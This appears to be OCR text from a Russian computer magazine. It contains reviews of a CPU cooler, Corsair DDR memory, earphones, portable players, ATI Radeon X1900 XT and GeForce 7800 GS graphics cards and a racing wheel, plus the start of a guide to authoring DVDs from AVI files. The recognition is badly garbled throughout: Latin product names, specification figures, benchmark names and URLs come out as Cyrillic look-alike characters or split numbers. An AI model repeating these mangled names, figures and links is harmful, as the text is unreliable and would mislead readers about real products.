гольной формы сделан из алюминия; оребрение — вертикальное. Использу- 
ется вентилятор среднего типоразмера 80 х 80 см и комбинированная систе- 
ма из подшипника скольжения и качения. Учитывая то, что у того же Рохсопп 
имеются модели с 2-мя подшипниками качения (более надежная механичес- 
кая конструкция) и практически той же стоимостью — это скорее недостаток 
данной модели. Крепление кулера — типичная качелька. Кулер фиксирует- 
ся на процессоре благодаря пластмассовому «рычагу», прижимающему всю 
конструкцию. В принципе, процесс инсталляции кулера достаточно прост и 
безболезнен. Кулер изначально рассчитан под стандартный крепеж матери- 
нской платы. Поэтому никаких дополнительных операций производить не 
придется. Однако следует максимально осторожно и аккуратно переводить 
рычаг в фиксирующее положение, иначе его можно запросто сломать. По 
термоэффективности кулер относится к середнячкам. Температура тестово- 
го процессора (АІЫоп 64 Ѵепісе 2500 МГц с поднятием напряжения до 1 ,55В) 
в режиме простоя поднималась до 44 °С, а после часа нагрева в бенчмарке 
З&М — до 50 — 51 °С. Результат нельзя назвать плохим, но для более серь- 
езного разгона или в случае использования более горячих камешков (АІЫоп 
Х2 или АІЫоп РХ) лучше использовать более мощные системы охлаждения. 
Немного подкупает уровень шума. Он находится на очень приемлемом уров- 
не и не вызывает никаких нареканий. Ну, и нельзя не отметить достаточно 
небольшие габариты кулера. При том, что в последнее время системы ох- 
лаждения становятся все больше и больше, компактность данного экземпля- 
ра можно считать маленьким плюсиком. В целом же данный девайс подой- 
дет тем, кто не готов платить большие деньги за навороченные кулеры на 
тепловых трубках. Это выбор тех, для кого определяющее значение имеет 
стоимость решения. 



Согзаіг ТѴѴІМХ2048-3500І.І-ПРО 

Модель: СМХ1024-3500І.1.РВО 

Емкость: 2 х 1024 МБ 

Частота: 438 МГц 

Тайминги: 2-3-2-6 

Дополнительно: светодиоды активности 



Тестовый стенд 

Процессор: АМР АІЫоп 64 3000+ 

Мат. плата: Ерох 9ІЧРА+ 

Жесткий диск: 1200 В ѴѴР Саѵіаг ЦВ 
Блок питания: Іпѵѵіп 430ѴѴ 



Результаты тестов 

РРВ400 — 2.0-3-2-5-1Т - 2.5Ѵ 

РРВ440 — 2.0-3-2-5-1Т - 2.6Ѵ 

РРВ450 — 2.0-3-2-7-1Т - 2.7Ѵ 

РРВ466 — 2.5-3-2-7-1Т - 2.7Ѵ 

РРВ500 — 3.0-4-3-7-1Т - 2.7Ѵ 

РРВ514 — 3.0-4-3-7-1Т - 2.8Ѵ (максимальный разгон) 

$350 



Перед энтузиастами-маньяками, собирающими хай-энд системы, частенько 
встает вопрос о том, брать быстрые, но менее емкие модули (читай 512МБ), 
или же большие и более тормозные (читай гигабайтовые планки), но с воз- 
можностью дальнейшего расширения до 4ГБ. Думаю, тебе известно, что 
главный козырь платформы АМЭ — это низкая латентность встроенного 
контроллера памяти и возможность работать в режиме 1Т при двух установ- 
ленных модулях. В случае же четырех модулей поддерживается только 2Т 
соттапб гаіе. Но поскольку до сегодняшнего времени гигабайтовые модули 
были намного медленнее, нежели плашки по 512 МБ, выигрыш от 1Т режи- 
ма перекрывался значительным проигрышем по всем остальным таймингам 
и максимально возможной частоте. Поэтому для топовых систем логичней 
было взять комплет 4 х 512. Компания Согзаіг смело разрушает данный сте- 
реотип, выпуская двухгигабайтный комплект со штатной формулой ООП438 
@ 2-3-2-6. В отличие от большинства оверклокерских модулей с чипами 
Затзипд ТССО, здесь установлены микросхемы ІпГіпеоп. Внешний вид пол- 
ностью соответствует серии ХМЗ РВО. Память упакована в алюминиевый 
радиатор черного цвета. Сверху на корпусе в два ряда располагаются 18 
светодиодов, индицирующие активность памяти. Память без проблем заве- 
лась на частоте 250МГц (ООН500) с таймингами 3-4-3-7-1Т. Самой высокой 
стабильно работающей частотой оказалась 257МГц (ООВ514) при тех же 
таймингах. С более подробными результатами разгона можно ознакомиться 
в приводимой таблице. Сразу хочется оговориться, что под «стабильно ра- 
ботающей», мы понимаем формулу, при которой память без ошибок прохо- 
дит часовой бенчмарк в программе З&М. Для безбашенных оверклокеров 
может быть интересным, что память заводилась на частоте 267МГц 
(ООН533) и даже проходила 1 круг теста ЗОМагк'05. Однако уже при втором 
проходе система вываливалась в В5СЮ. Стоит отметить, что память выжи- 
мает из себя весь доступный потенциал при вполне разумных напряжениях. 
Поднятие его до З.ОѴ нисколько не увеличивает потолок разгона. А еще 
большее увеличение только ухудшает разгон. В целом продукт получился 
отличного качества и станет прекрасным выбором для А64-систем. 
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СКЕ8Ѵ1І АХЕ600МЕ 

Тип наушников: вкладные 

Импеданс, Ом: 1 6 

Чувствительность, Дб/мВт: 106 

Максимальная входная мощность, Вт: 40 

Частотный диапазон, Гц: 12-22000 

$31 



Компания СВЕЗУИ специализируется на выпуске таких устройств, как мик- 
рофоны, наушники, динамики, кабели, зарядные устройства и так далее. К 
нам в руки попали наушники, относящиеся к классу вкладных — СПЕЗУИ 
АХЕ600ИЕ. Они предназначены для фанатов различных переносных уст- 
ройств типа МРЗ-плееров, ноутбуков и так далее. Сразу отметим выдаю- 
щийся дизайн — поверхность корпуса покрыта металлической пленкой, соз- 
дающей иллюзию титана, а форма выполнена эргономично, так что в ушах 
они сидят очень хорошо и совершенно не обязательно на них надевать ам- 
бушюры (которые, кстати говоря, входят в комплект). В качестве изолятора 
в проводах применяются не резиновые кембрики, а тканевая оплетка, что, 
безусловно, хорошо, так как резина имеет свойство со временем трескать- 
ся. К сожалению, сам кабель длиной всего полметра, что вполне достаточ- 
но для плеера, если он висит на шее, но если ты захочешь положить его в 
карман, то такой длины не хватит. Правда, в комплекте есть удлинитель на 
70 сантиметров, но такая конструкция не всегда удобна. 

Качество звука оказалось на очень высоком уровне: никаких дребезжаний 
на высокой громкости, хорошо прослушиваются высокие частоты. Басы то- 
же хорошие, но они все же недотягивают даже до небольших накладных на- 
ушников. Надо отметить, что наружу из наушников никакие звуки не прони- 
кают, и никто не будет знать, что ты слушаешь. Все штекеры как на удлини- 
теле, так и на самих СВЕЗУЫ АХЕ600ЫЕ покрыты золотым напылением для 
более надежного контакта. 

Если провести итоги дебюта СВЕЗУЫ на российском рынке, то его в полной 
мере можно назвать положительным: выпущенный ими продукт полностью 
соответствует всем требованиям, которые предъявляют любители взять му- 
зыку с собой в дорогу. Стоимость СНЕЗУИ АХЕ600ЫЕ полностью характери- 
зует их качество, так что относительно большая цифра на ценнике не долж- 
на тебя смутить — за эти деньги ты получишь качественный продукт, кото- 
рый полностью себя оправдает. 



МоЫВОХ Н22 

Объем встроенной памяти: 128(256) Мб 

Поддерживаемые флеш-карты: 5Р/ММС 

Поддерживаемые форматы: трЗ, ѵѵта, азТ , тред 4 

Габариты: 103x62x16 мм 

Аккумулятор: Ц-Іоп 780 гпАИ 

Вес: 87 г. 

$300 



Все более популярными на нашем рынке становятся устройства, которые 
совмещают в себе несколько мультимедийных функций. Плеер-флешдрайв — 
хорошо, добавили матрицу и простенький объектив — еще лучше. А если девайс 
сможет играть музыку, ловить любимую радиоволну, делать снимки и 
видеозаписи, при этом умещаясь в кармане рубашки, — успех ему гарантирован. 
Сейчас мы оценим мультикомбайн, который представила компания МоЫВОХ. 
Посмотрев на устройство, можно подумать, что внутри кроется маленький 
винчестер, но, взяв его в руку, сразу понимаешь, что производитель 
пожертвовал емкостью ради веса — МоЫЬох Н22 с аккумулятором потянет 
всего на 87 граммов. Что ты можешь получить, отдав за эти граммы пластика 
и кремния свои кровные? Функционально насыщенный и обученный русскому 
языку девайс, готов предложить свою помощь в 8 сферах жизни: видеозапись, 
фотосъемка, воспроизведение музыки и видео, прослушивание радио, 
диктофонная запись, запись аналогового видеосигнала и спасение тебя от 
темноты. Давай посмотрим, как реализованы функции технически. 
Трехмегапиксельная матрица и интерполирование картинки до 6Мп 
позволяют делать снимки и снимать видео. Причем качество, как и размер 
картинки, можно выбирать. В качестве фотовспышки или подсветки 
используются два светодиода, которые можно активизировать, чтобы 
пользоваться ими освещая себе путь, — в меню этой функции отведен 
отдельный пункт. Меню на русском языке интуитивно понятно и проблем у 
тебя не должно возникнуть. Интересно и то, что «фотоаппарат» размещен во 
вращаемом барабане, который можно повернуть в горизонтальной плоскости 
на 230 градусов — так реализована защита объектива. В качестве 
видоискателя выступает двухдюймовый ТРТ-дисплей. Плеер достаточно 
всеяден и может воспроизводить форматы трЗ, ѵѵта, аз( и, конечно, тред 4. 
Просмотр видео осуществляется на этом же маленьком, но очень ярком 
экране (262 тыс. цветов) — даже в солнечную погоду можно увидеть 
картинку. Хранить все данные пользователь может либо во внутренней 
памяти (есть модификации со 128 и 256 Мб встроенной флеш-памяти), либо 
на карте памяти формата 80/ММС, для чего с левой стороны есть слот. Под 
задней крышкой прячется Ы-Іоп аккумулятор(780 тАб) и место для хранения 
второй флеш-карты. Емкости батареи хватает больше, чем на 2 часа работы. 
Производителям пришла в голову интересная мысль: совместить устройства, 
которые многие распихивают по карманам, выходя из дома. Идея реализована 
неплохо, но некоторые недостатки портят впечатление. Среди минусов стоит 
отметить малый объем встроенной памяти, небольшой дисплей, на котором не 
очень-то посмотришь видео, и слабый аккумулятор. Как многофункциональный 
гаджет, МоЫВОХ Н22 справляется со своими задачами достойно, так что я не 
удивлюсь, если скоро подобное устройство найдет себе место и в твоем кармане. 
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М8І тедаріауег 541 

Интерфейс с компьютером: Ц5В 2.0 

Поддерживаемые форматы: трЗ, ѵѵаѵ, ѵѵта 

Радио: есть 

Аккумулятор: встроенный Шоп 

$130 



Интересная новинка появилась среди трЗ-плееров — МЗІ Медаріауег 541 . 
Обладая привлекательной внешностью и лаконичным дизайном, девайс 
имеет хорошую начинку. Возможностью проигрывания треков в диапазоне 
битрейта от 8 до 320 Кбит/сек уже никого не удивишь, но воспроизведение 
\л/аѵ-файлов поддерживают не все плееры. Отличительной особенностью 
можно считать возможность выдавать звук сразу на две пары наушников, 
так что ты со своей девушкой или приятелем сможете наслаждаться стере- 
озвуком одновременно. Один из выходов может быть использован как Ііпе- 
іп для записи напрямую с любого источника. Встроенный 1_і-Іоп аккумулятор 
обеспечит громкое и качественное воспроизведение в течение, примерно, 
пяти часов. Плюсом такого решения является целостность плеера и малый 
вес. Зарядка осуществляется за пару часов по шине ІІЗВ. Отделанный при- 
ятным на ощупь черным пластиком, плеер использует для вывода информа- 
ции двухцветный СИЕО-дисплей, который остается хорошо читаем даже в 
солнечную погоду. Четыре строки позволяют вывести достаточно символов 
для опознания песни. К сожалению, из наиболее популярных в России язы- 
ков, поддерживается только английский, но, если ты свободно говоришь на 
корейском, китайском или японском — будешь приятно удивлен. Итак, меню 
нам доступно только на английском языке. Русские тэги были конвертирова- 
ны плеером в иероглифы, и догадаться о следующей композиции возмож- 
ности не было, хотя названия файлов на родном нам языке девайс читал от- 
лично. Приятно удивило радио: качество приема на достаточно высоком 
уровне — даже в глухих помещениях можно рассчитывать на хорошее сте- 
рео. Возможность запомнить 20 станций пригодится так же, как и 6 предус- 
тановленных режимов эквалайзера. Присутствует возможность ручной уста- 
новки частот. Особо стоит отметить возможность чтения текстовых файлов 
— чего-чего, а отображать текст трЗ плееры еще не обучены. Достаточно 
залить (х(-файл с нужной книгой и можно наслаждаться чтением в дороге, но 
опять подвело отсутствие поддержки русского языка. Возможно, к выходу 
журнала появится свежая прошивка с русским языком, и тогда можно будет 
слушать музыку, радио и читать книги на этом чудном устройстве. 
Некоторые мелочи напоследок. Экран достаточно информативен и отобра- 
жает всю информацию о проигрываемом треке, но эквалайзер в верхней 
части экрана несколько притормаживает. Заглушка на 115В несколько утоп- 
лена в корпус и, возможно, тебе придется потратить несколько секунд на то, 
чтобы достать ее. Цвета экрана подобраны достаточно удачно: желто-голу- 
бое свечение различимо в любую погоду, а возможность регулировки конт- 
раста предотвратит раздражение от яркого свечения. 



Роѵѵегсоіог АТІ Касіеоп 
XI 900 ХТ 512 МВ 

Чип: АТІ Вабеоп XI 900 ХТ (В580) 

Технология: 90 нм 

Объем памяти: 512 МВ ѲРРВЗ 

Частота ѲРЦ: 625 МГц 

Частота памяти 725 (1450) МГц 

Число пиксельных конвейеров: 48 

Число вершинных конвейеров: 8 

Число ВОР: 16 

Число ТМ11: 16 

Версия пиксельных/вершинных шейдеров: 3.0 

Интерфейс: РСІ-Е 16х 

Тестовый стенд 

Процессор: АМР АЙіІоп 64 3000+ @ 2400 МГц 

Мат, плата: ЕроХ 9ЫРА+ 

Память: 2 х 1024МВ ОС2 РРВ400 (2-3-2-5-1Т) 

Жесткий диск: 1200 В ѴѴР Саѵіаг ЛЗ 

Блок питания: Іпѵѵіп 430 Ватт 



Результаты тестов 

ЗРтагк'05 (1 024x768), баллов: 1 0247 
ЗРтагк'06 (1280x1024), баллов: 4715 
ЗРтагк'06, 8М 2.0, баллов: 21 74 
ЗРтагк'06, 5М 3.0, баллов: 2433 

Роот III (1024x768), фз: 124 

НаІМ-йе 2 (1024x768), фз: 103 

$630 



Смена действующего короля 30-графики сейчас стала происходить пример- 
но раз в полгода. Прошлым летом Ыѵісііа выпустила чип Ѳ70, который занял 
подиум, и вот спустя чуть более 7 месяцев АТІ выпускает ответный чип с ко- 
довым названием В580. 380 миллионов транзисторов, 90 нм техпроцесс и до 
гигабайта ОЮОРІЗ памяти с 256-битным интерфейсом. В новом чипе заложе- 
на поддержка шейдеров 3-й версии (ЗІтасІег МобеІ 3.0), а также на аппарат- 
ном уровне реализованы функции видеопроцессора, ускоряющего процесс 
компрессии и декомпрессии потокового видео. Число пиксельных конвейе- 
ров увеличилось до феноменального количества — 48 единиц. Флагманскую 
линейку АТІ представляют две модели — 1 900ХТ и 1 900ХТХ, — отличающи- 
еся только частотами ѲРЕІ и памяти. Для 1 900ХТ штатные значения состав- 
ляют 625 / 725 (ОЭВ1450), для 1900ХТХ — 650 / 775 (ЭОВ1550). С такой ви- 
деокартой поистине забываешь о всяческих графических оптимизациях и 
разгоне. Производительности хватает только для того, чтобы любые прило- 
жения и игры безупречно работали при любых настройках. На долго ли это, 
сказать трудно, поскольку не за горами тот момент, когда Ыѵісііа выпустит 
свой ответ новому королю ЗО-графики. К слову о разгоне. Г онится карточка 
(в нашем случае это был Вабеоп Х1900ХТ) очень туго и неохотно. Даже на 
несильно поднятых частотах старшей модели (Х1900ХТХ) уже проявлялись 
всяческие артефакты, так что любителям «бесплатных» (рз поживиться тут, 
пожалуй, будет нечем. А для тех, кому нужен Іор Ні-Епб, всегда есть возмож- 
ность установить ведущую карту и два акселератора в режиме Сгоззііге. 
Правда, тут надо отметить очень высокое энергопотребление нового ускори- 
теля. Каждая плата «кушает» порядка ІООВатт, поэтому сама АТІ убедитель- 
но рекомендует использовать блоки питания мощностью не менее 450 Ватт 
с одной картой и не менее 550 Ватт в режиме Сгоззііге. 
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ТГігизІтазІег Реггагі СТ 2-іп-І 
Рогсе РеесІЬаск Васіпд ѴѴИееІ 

Интерфейс: Ц5В и Ѳатерогі 

Совместимость: ПК и 5опу РІау Зіаііоп 2 

Управление: 8-позиционный переключатель видов, кнопка возврата руля в центр, располо- 

женная на рулевом колесе, возможность программирования коробки передач 

Комплектация: Руль, площадка с педалями, инструкция, диск с драйвером, крепеж к столу. 

$80 



Дизайн Реггагі ѲТ 2-іп-І Рогсе РеесІЬаск похож на автомобильные рули 
Реггагі и ѲТ. Эргономика ТЬшгітазІег Реггагі продумана до мелочей. Руле- 
вое колесо оснащено удобными резиновыми накладками для комфортной 
игры и четкой фиксации в руках. Дополнительные программируемые кноп- 
ки легко нажимаются и расположены очень эргономично, не мешая управ- 
лять, но при этом всегда находятся под рукой. Баранка оснащена двумя под- 
рулевыми переключателями для смены передач, как на настоящих спортив- 
ных машинах, а специальная кнопка возврата руля в центр, расположенная 
прямо на рулевом колесе, предназначена для большего удобства вождения. 
Система крепления надежно удерживает девайс, не давая ему сдвигаться 
во время гонок даже на самых крутых участках трассы. Дополнительную 
чувствительность манипулятору придает линейная система сопротивления. 
С помощью технологии Іттегзіоп девайс обеспечен усиленной виброотда- 
чей. А специальная кнопка Рогсе Ьиііоп «Р», расположенная на руле, позво- 
ляет включать/выключать систему вибрации в любой момент игры. Идущие 
в комплект педали имеют длинный ход нажатия, что способствует более точ- 
ному управлению акселератором и тормозной системой. Для четкой фикса- 
ции с полом внизу на площадке с педалями установлены 5 резиновых но- 
жек, которые не дадут педалям «уехать» в нужный момент. Теперь о совмес- 
тимости. Тестируемый руль имеет стопроцентную совместимость виброот- 
дачи и с ПК, и с Зопу РІау Зіаііоп 2 и оснащен комбинированным интерфей- 
сом подключения к ЫЗВ и Сатерогі (специальный переходник входит в 
комплект). Мы протестировали этот агрегат на ПК с игрой ЫеесІ Рог Зреесі 
Мозі ѴѴапІесі. При подключении к ПК сначала установили драйвер, входящий 
в комплект. Ни каких проблей этот процесс не вызвал и занял около 2-х ми- 
нут. Затем через ДЗВ воткнули руль, и ѴѴІп ХР сразу определил принадлеж- 
ность девайса. Потом запустили игру, но и тут никаких траблов не произош- 
ло. Весь процесс инсталляции и подключения прошел гладко. Игра также 
показала, что у нас есть Реггагі ОТ 2-іп-І Рогсе РеесІЬаск и предложила зап- 
рограммировать все кнопки включая педали. Во время игры вибрация была 
что надо и сопротивление руля было похоже на реальное вождение авто. 
Жаль, что у нас на дорогах так отжечь нельзя. Подытоживая, можно смело 
сказать, что ТЬгизітазіег всегда радует геймеров, и этот руль мы рекомен- 
дуем всем ярым поклонникам гонок. 



ЬеасНек ѴѴіпГазі А7800С8 ТОН 

Интерфейс: АѲР 8Х 

Ядро: ГМѴЮІА Ѳ70 

Количество пиксельных конвейеров, шт: 16 

Шина памяти, бит: 256 

Объем памяти, Мб: 256 

Частота ядра, МГ ц: 375 

Частота памяти, МГц: 1200 

Тип памяти: ѲРРП-3 

Выходы: РѴІ, Р-5иЬ, 5-ѴісІео 



Тестовый стенд 

Процессор, МГц: 2200, АМР АШІоп ХР 2500+@3200+ 

Материнская плата: Ерох 8ВРАЗІ (ЫѴІРІА пРогсе2 5РР Шга400) 

Память, Мб: 2x512 Нупіх РРВ400 

Кулер: ОІасіаІТесИ Ідіоо 2520 Рго 

Жесткий диск, Гб: 80, Зеадаіе 7200грт 

Блок питания, Вт: 350, РоѵѵегМап 

Результаты тестов 

ЗРМагк’ОЗ, баллы: 1 0966 

ЗРМагк’05, баллы: 5430 

Раг Сгу, РР5: 80,41 

Роогп 3, РР5: 61 ,5 

НаІМ-йе 2, РР5: 106,3 

Р.Е.А.Р. (5оП ЗЬасІоѵѵз ОЫ), РР5: 34 

$80 



Г рафическая шина АСР устаревает, но с рынка окончательно уходить даже и не 
думает. В конце концов, не каждый согласится менять добрую половину начинки 
«железного друга» ради повышения РРЗ в современных играх, тем более, если 
все остальные компоненты системы выдают вполне приемлемую производитель- 
ность. Выход один — искать что-нибудь подходящее под старый добрый АСР 8Х, 
благо платы на практически любом современном чипсете можно найти в соответ- 
ствующем варианте. Вот и ЬеасКек выпустила девайс, основанный на новейшем 
чипсете РІѴЮІА ѲеРогсе 780003 — новом мэйнстримовом решении, призванном 
заменить главного МісМІе-Епб игрока компании — ОеРогсе 680003. Разумеется, 
ничего нового сам чип в себе не несет — это всего лишь урезанная вариация «ста- 
рого-доброго» 070, тем не менее интерес эта плата представляет благодаря ис- 
пользуемому интерфейсу. Посмотрим, что из этого получилось. 

Комплектация платы среди аналогов ничем особенным не выделяется: в короб- 
ке присутствует несколько кабелей, два ЭУЭ с играми, мануал и диск с драйве- 
рами и фирменной утилитой ѴѴІпРох (разгон и тонкая настройка девайса). Пла- 
та, разумеется, собрана на основе референса, охлаждение на ней установлено 
соответствующее. Рабочие частоты составляют 375 МГц по чипу и 1200 — по 
памяти, которой тут, кстати, 256 Мб. Модули СЮОН-3 щедро снабжены охлаж- 
дением. Те, что расположены на лицевой части платы, находятся под кулером, 
другие, распаянные с обратной стороны, укрыты своеобразным теплоприемни- 
ком — металлической пластиной, которая служит еще и частью крепления ку- 
лера. Чип моста, обеспечивающего трансляцию сигнала РСІе в АСЗР, также ох- 
лаждается общим кулером и знать о себе не дает вообще. Напоследок отметим 
наличие в задней части платы дополнительного коннектора питания — придет- 
ся распрощаться с одним свободным тоіех’ом (впрочем, невелика потеря). 
Плата была протестирована в стандартном наборе приложений с рабочим 
разрешением 1024x768 точек и максимальной детализацией (для игр). Как 
видишь, показатели впечатляют — прямо-таки снова хочется верить в воз- 
можности АСР 8Х! В итоге мы получили очень хороший продукт, действи- 
тельно способный подарить второе дыхание среднестатистической системе 
с устаревшей графической шиной. 
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ТЕХТ ѴІТМАЫ $) / ѴІТ МАМ@51ІРНЕМЕ2.ПІГ 



йШШ и,ИАЯ 



СОЗДАНИЕ ОѴО-ДИСКОВ ИЗ ФОРМАТА АѴІ 



йі ДАВАЙ ДЛЯ НАЧАЛА ОБГОВОРИМ ВСЕ НЮАНСЫ И ПОДУМАЕМ, А НА- 
ДО ЛИ ТЕБЕ ЭТИМ ЗАНИМАТЬСЯ? ЕСЛИ В ТВОЕМ ДОМЕ СТОИТ МУЛЬТИ- 
МЕДИА-ЦЕНТР, ТО ВРЯД ЛИ ТЕБЕ ПОНАДОБИТСЯ ЭТОТ МАТЕРИАЛ, А ЕС- 
ЛИ У ТЕБЯ, КАК И У МЕНЯ, ИМЕЕТСЯ КОМПЬЮТЕР, А БОЛЬШОЙ ТЕЛЕВИ- 
ЗОР В КОМПЛЕКТЕ С ОѴЭ-ПРОИГРЫВАТЕЛЕМ РАСПОЛОЖЕН В «БОЛЬ- 
ШОЙ» КОМНАТЕ, ТО СОВЕТУЮ ПРОЧИТАТЬ ДАННЫЙ МАТЕРИАЛ. рр 



ІЫТНО 



Тема создания ОѴО-дисков настолько обширная, что даже 
если мне весь журнал отдадут для нее, то рассказать все 
тонкости этого занятия не получится. В своей статье я 
лишь расскажу об основах, как сделать достойную кол- 
лекцию, приложив минимум усилий и получив максималь- 
ную отдачу. Под словом «отдача» мы, естественно, будем 
подразумевать качество материала, ведь не зря великие 
умы планеты работали, придумывали все эти стандарты. 
Для получения наилучшего качества, а именно на это мы и 
будем делать ставку, ведь ты читаешь эту статью не для то- 
го, чтобы штамповать диски и продавать их с лотков у мет- 
ро (учти, это дело неблагодарное), нам потребуется мате- 
риал хорошего качества, по крайней мере, помни, что на 
экране телевизора он будет именно таким, каким ты его 
видишь в полноэкранном режиме на мониторе. Я думаю, 
что у тебя в голове уже появились мысли о том, зачем это 
надо? Ведь намного проще, скажешь ты, пойти и купить 
диск с нужным фильмом. Но, во-первых, диски стоят доро- 
же, чем болванки, во-вторых, не везде можно найти имен- 
но то, что тебе необходимо. Я думаю, даже этих пунктов 
уже достаточно, хотя их можно продолжить. Перед тем как 
становиться крутым видеокодером, надо запастись всем 
необходим материалом, который потребуется для созда- 
ния самой шикарной видеоколлекции. Не будем брать в 
рассмотрение софт, о нем поговорим позже, а пока убе- 
дись, что у тебя в наличии есть: 



ОѴО+В-болванки. Можно, конечно, и «-Р», но это учитыва- 
ется из характеристик проигрывателя. К примеру, у меня 
древний «Пионер», который не читает минуса. Ссылку на 
подробное описание форматов смотри во врезке к статье. 
ОѴО-ВѴѴ-болванка На ней мы будем проверять, что у нас 
получилось непосредственно на проигрывателе, чтобы не 
портить обычные болванки. 

РѴО-ВесогсІег, поверь, он тоже пригодится ;). 

Желательно иметь довольно шустрый компьютер с хоро- 
шим запасом оперативки. Конвертирование видео — до- 
вольно ресурсоемкий процесс, и на Р4 1500 МНг с 1 ОЬ 
мозгов в среднем один фильм создается за 4 — 5 часов со 
стопроцентной загрузкой процессора, а на Р4 3000 МНг с 
1 ѲЬ памяти он занимает порядка полутора часов с загруз- 
кой процессора в 60 — 70%. 

Собственно, про материал я уже говорил, но на всякий 
случай повторюсь. Не пожалей трафика, скачай фильм в 
хорошем качестве. Я большинство фильмов качал из р2р- 
сетей, благо там и выбор большой, и на фильмы очередь 
не всегда забита. Если у тебя нет времени, чтобы качать 
фильм, то в Интернете полно сервисов, которые могут 
слить мувик за тебя, а ты можешь утянуть их уже о серви- 
са с хорошей скоростью или заказать фильм по почте. 
Примеры тому — всем известные ѵѵѵѵѵѵ.НоасІ.ги и ѵѵѵѵѵѵ.ІІІе- 
розі.гц . 




Довольно подробное описание совместимости форматов дисков с устройствами можно прочитать на Зсіпеѵѵз — 
им«.Зі1пе«5.ги/геѵіещ/5Іогаае/йѵсІ-г/іп!іех.Мт. 
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Теперь давай обговорим концепцию 
создания видеоколлекции. Я переп- 
робовал достаточно много решений: 
записывал по два фильма на диск, 
по одному, но с красивым меню, и в 
итоге пришел к выводу, что самый 
лучший вариант — это запись на 
диск одного фильма без меню. То 
есть ты вставил диск в проигрыва- 
тель, нажал «РІау», и начался фильм. 
Тем более, данный вариант позволя- 
ет добиться лучшего и максимально 
возможного битрейта. О битрейте 
следует поговорить отдельно. Во 
всех программах его можно задать 
как константную величину или авто- 
матический выбор — на усмотрение 
кодека. При выборе автоматическо- 
го режима программа сама будет ре- 
шать, в каких моментах его поднять, 
а в каких — опустить. Кстати, размер 
будущего файла напрямую зависит 



от битрейта, а разрешение картинки 
практически на это не влияет. В 
большинстве случаев, если фильм 
не слишком динамичный, советую 
оставить авторежим. По крайней ме- 
ре, если что-то не устроит, всегда 
можно выставить его битрейт посто- 
янным. 3000 — 4000 для этого подой- 
дет очень даже, так как большего мы 
из нашего аѵі выжать не сумеем. Ме- 
ню, конечно, можно создавать с воз- 
можностями выбора субтитров или 
звуковой дорожки, выбора фрагмен- 
та, с которого надо начать просмотр 
видео. Но все эти излишества в ре- 
зультате не оправдывают себя. Вы- 
бор фрагмента не обязателен, так 
как при создании фильма он автома- 
тически будет резаться на фрагмен- 
ты, интервал которых можно указать, 
а пролистать на 35-ую минуту не сос- 
тавит никакого труда. Создание нес- 



кольких звуковых дорожек или суб- 
титров — тоже в нашем случае вари- 
ант лишний, так как фильмы, скачан- 
ные нами, обычно ничего из этого не 
содержат, а если и содержат, то это 
довольно редкий случай, о котором я 
обещаю рассказать отдельно. 

Итак, с концепцией мы определились: 
наш эталон — это просто фильм, не со- 
держащий в себе никаких лишних меню. 
Чтобы создать его, нам надо запас- 
тись необходимым софтом. Я лично 
перепробовал просто тучу всевоз- 
можных конверторов — и те, которые 
имеют в себе огромное количество 
функций, вплоть до вставления 25-го 
кадра, и те, которые работают по 
принципу «Опе сііск». 

Большинство из них, как и следова- 
ло ожидать, оказались полным хла- 
мом, но иголки в стоге сена все же 
были найдены. 



Первая программа, которая отличается своей простотой, — это ІМего Ѵівіоп, идущая в комплекте с седьмой версией Ыего. 
Работает она по принципу «пара кликов, и готово». 

После запуска нам задают вопрос: «Что вы хотите сделать?». Выбираем пункт «Сделать ОѴО -» 0\Ю Видео». 
Приложение запущено, и перед нами экран, в который надо добавить файлы. Из этих файлов мы будем создавать 
первый диск. На диске у нас будет всего один фильм, поэтому добавляй его в список. Давай сразу посмотрим 
настройки программы. Никаких особых настроек в ней нет. Только самый минимум, который можно 
отредактировать, прокликав связку «Еще >> Опции видео». Тут можно выбрать формат, в котором будет 
создаваться видео (РАБ/ЫТЗС). Для нашей странны, для Европы и для остальной половины земного шара 
стандартом является «РАБ», поэтому его мы и оставим. Использование интеллектуального кодирования видео нам 
очень даже пригодится, потому что иногда это помогает создать довольно качественный материал на плохих его 
участках. Далее переходим на вкладку ОѴО-Ѵісіео. Для начала надо разобраться с форматом, в котором будет 
создан будущий фильм. Если телевизор у тебя дома широкоэкранный, то выбирай режим 16:9, если нет, то — 4:3. 
У меня телевизор широкий, поэтому я выбираю 16:9. Если ты не знаешь, какой у тебя телик, — попробуй сначала в 
одном формате, потом — в другом. Какой больше приглянется, тот и оставь. Приготовься сразу к тому, что тебе 
придется создавать много дублей. Далее следует установка качества — это как раз и есть установка битрейта. 
Выбирай сразу «автоматически», а там уже видно будет. Остальные настройки уже выбирай на свое усмотрение: 
формат звука и количество проходов. Количество проходов, конечно, увеличивает качество, но не в глобальных 
масштабах. Да, должен сразу предупредить, что ІЧего — далеко не лучший кодек для создания гпред2. Нажимаем 
«Далее». А «Далее» нам предлагают состряпать меню :). Увы, отказаться от этого пункта не получится, поэтому 
кликаем по окошку и открываем Мели Ебііог. Тут у нас фантазия может разойтись, так как предложено множество 
вариантов по украшению проекта. Лично я всегда выбираю черный фон и кадр из фильма. Чтобы выбрать кадр, 
надо кликнуть правой кнопкой по предмету и выбрать «Свойства». Тут можно отредактировать название и выбрать 
ползунком необходимый кадр. После окончания настроек меню кликаем «Далее». Теперь мы имеем возможность 
посмотреть проект на воображаемом телевизоре! Следующим шагом необходимо выбрать параметры записи. Мы 
не будем сразу жечь на диск, а сохраним вое в папку. 

Вое! Теперь ждем, пока проект соберется. 



Данная программа от предшествующей отличается своей 
простотой и легким интерфейсом. Все четко, грамотно. Ра- 
зочаровывает только отсутствие русского языка. После ус- 
тановки она наверняка попросит дать доступ в Интернет, 
чтобы проверить обновления. Смело пускай, потому что 
версии выходят с небольшим интервалом. Сразу же лезем 
в настройки. Давай разберем все вкладки по порядку: 
СепегаІ. Тут мы можем выбрать основную папку, в которую 



будут складываться проекты Пиши что-нибудь вроде 
«ІЛбѵсЛ». При создании фильма программа автоматом соз- 
даст в рабочей директории папку с именем фильма, а уже 
в нее сложит все, что нам потребуется. Не бойся запутать- 
ся в настройках, так как наличие кнопки «Везеііо сІеТаиІІз» 
помогает всегда все вернуть обратно. Можешь выбрать 
скин для программы — вещь ненужная, но приятная. 
Вкладка «Бапдиаде» в описание не нуждается, так что сразу 
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В Интернете полно руководств и описаний, большую их часть можно найти, задав вопрос Яндексу «руководство по РѴРІаЬ» 
но. чтобы не мучиться, можно сразу идти на Мр://ѵісІеоесІІ1.и(асот.ги. 

Иего — «тш. пего, сот. 

Ѵ50 РіѵхТоРѴР — ««м. ѵ$о-зоИ«/аге.1г. 

ТМРСЕпс — ««м.Ітрдепс.пеБ 



